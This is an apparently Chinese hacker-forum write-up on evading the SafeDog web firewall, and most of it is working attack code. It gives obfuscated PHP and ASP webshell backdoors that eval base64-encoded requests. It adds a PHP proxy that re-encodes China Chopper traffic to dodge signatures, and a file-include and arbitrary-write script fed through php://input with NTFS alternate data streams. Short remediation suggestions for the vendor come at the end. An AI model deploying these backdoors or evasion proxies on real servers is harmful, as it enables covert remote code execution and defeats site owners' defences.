0x00 安全狗之菜刀的突破
#原理:
BAD: caidao -> safedog -X-> backdoor
GOOD: caidao -> middle -> safedog -> backdoor -> middle -> caidao

菜刀发送的数据是会被安全狗拦截,因为菜刀的发的数据已被纳入安全狗的特征码内
但是如果我们在菜刀与狗之间放一个加密数据的脚本,将原数据进行修改加密,然后再通过脚本发送出去
类似为一个代理,发出去的数据流到安全狗,因为没有特征码了,数据流到服务器上的shell,shell把加密后的数据进行解密然后再执行,执行完后将数据返回给代理脚本,最终流回菜刀。

#代码
#middle.php

<?php
        /*
         * Author: Laterain
         * Time: 20130821
         * About: Middle monkey between the hacker and safedog.
         * Just For Fun
         */
        $url = isset($_GET['shell'])?$_GET['shell']:'';
        $pass= isset($_GET['pass'])?$_GET['pass']:'';
        $type= isset($_GET['type'])?$_GET['type']:'php';
        if ($type == 'php') {
                $shellcode = base64_encode('@eval(base64_decode($_POST[z0]));');
        }
        elseif ($type == 'asp') {
                $shellcode = base64_encode($_POST[$pass]);
        }
        $shellcode = $pass.'='.urlencode($shellcode);
        foreach ($_POST as $key => $value) {
                if ($key == $pass) {
                        continue;
                }
                $shellcode .= '&'.$key.'='.urlencode($value);
        }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $shellcode);
        $data = curl_exec($ch);
        curl_close($ch);
        print_r($data);
?>

#php backdoor

<?php
$key = "hack";
preg_replace(base64_decode('L2EvZQ=='),base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFska2V5XSkp'),'a');
?>

#asp backdoor

<%
     OPTION EXPLICIT
     const BASE_64_MAP_INIT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
     dim Base64EncMap(63)
     dim Base64DecMap(127)
         dim code
     '初始化函数
     PUBLIC SUB initCodecs()
          ' 初始化变量
          dim max, idx
             max = len(BASE_64_MAP_INIT)
          for idx = 0 to max - 1
               Base64EncMap(idx) = mid(BASE_64_MAP_INIT, idx + 1, 1)
          next
          for idx = 0 to max - 1
               Base64DecMap(ASC(Base64EncMap(idx))) = idx
          next
     END SUB
     'Base64加密函数
     PUBLIC FUNCTION base64Encode(plain)
          if len(plain) = 0 then
               base64Encode = ""
               exit function
          end if
          dim ret, ndx, by3, first, second, third
          by3 = (len(plain)  3) * 3
          ndx = 1
          do while ndx <= by3
               first = asc(mid(plain, ndx+0, 1))
               second = asc(mid(plain, ndx+1, 1))
               third = asc(mid(plain, ndx+2, 1))
               ret = ret & Base64EncMap( (first  4) AND 63 )
               ret = ret & Base64EncMap( ((first * 16) AND 48) + ((second  16) AND 15 ) )
               ret = ret & Base64EncMap( ((second * 4) AND 60) + ((third  64) AND 3 ) )
               ret = ret & Base64EncMap( third AND 63)
               ndx = ndx + 3
          loop
          if by3 < len(plain) then
               first = asc(mid(plain, ndx+0, 1))
               ret = ret & Base64EncMap( (first  4) AND 63 )
               if (len(plain) MOD 3 ) = 2 then
                    second = asc(mid(plain, ndx+1, 1))
                    ret = ret & Base64EncMap( ((first * 16) AND 48) + ((second  16) AND 15 ) )
                    ret = ret & Base64EncMap( ((second * 4) AND 60) )
               else
                    ret = ret & Base64EncMap( (first * 16) AND 48)
                    ret = ret '& "="
               end if
               ret = ret '& "="
          end if
          base64Encode = ret
     END FUNCTION
     'Base64解密函数
     PUBLIC FUNCTION base64Decode(scrambled)
          if len(scrambled) = 0 then
               base64Decode = ""
               exit function
          end if
          dim realLen
          realLen = len(scrambled)
          do while mid(scrambled, realLen, 1) = "="
               realLen = realLen - 1
          loop
          dim ret, ndx, by4, first, second, third, fourth
          ret = ""
          by4 = (realLen  4) * 4
          ndx = 1
          do while ndx <= by4
               first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
               second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
               third = Base64DecMap(asc(mid(scrambled, ndx+2, 1)))
               fourth = Base64DecMap(asc(mid(scrambled, ndx+3, 1)))
               ret = ret & chr( ((first * 4) AND 255) +   ((second  16) AND 3))
               ret = ret & chr( ((second * 16) AND 255) + ((third  4) AND 15))
               ret = ret & chr( ((third * 64) AND 255) + (fourth AND 63))
               ndx = ndx + 4
          loop
          if ndx < realLen then
               first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
               second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
               ret = ret & chr( ((first * 4) AND 255) +   ((second  16) AND 3))
               if realLen MOD 4 = 3 then
                    third = Base64DecMap(asc(mid(scrambled,ndx+2,1)))
                    ret = ret & chr( ((second * 16) AND 255) + ((third  4) AND 15))
               end if
          end if
          base64Decode = ret
     END FUNCTION
' 初始化
    call initCodecs
        code = request("hack")
        code = base64Decode(code)
        eval code
%>

0x01 安全狗之突破恶意代码拦截
原理:
php://input没有被检查,在这儿写恶意代码即可。
以ADS的方式上传了shell之后,包含即可。
base.php

<?php
if (isset($_GET['inc'])) {
        include($_GET['inc']);        
}
elseif (isset($_GET['path'])) {
        fwrite(fopen($_GET['path'], "w"), file_get_contents("php://input"));
}
else {
        echo __FILE__;
}
?>

#修复建议:
1.因为有了middle的任意加密混淆与backdoor的对应解密,安全狗官方应该也很难解决拦截菜刀数据的问题,但是可以从backdoor入手,加强对服务器后门的扫描探测能有效的防止这个问题。
2.通过包含来获取shell,这就只有加强特征码了。
3.无法发现ADS创建的后门的问题,我的想法是,服务器自身是不允许访问ads创建的文件的,只能通过包含来访问,那么可以将include,require等里面带:的归为危险文件。当然能直接发现更好。
4.php://input内容过滤
PS:本来以为php://input是我最先发现的,但是昨天看见某某在freebuf上提到了这个的利用,我就被打击了。。。于是就发出来吧。。。
作者:laterain form 90sec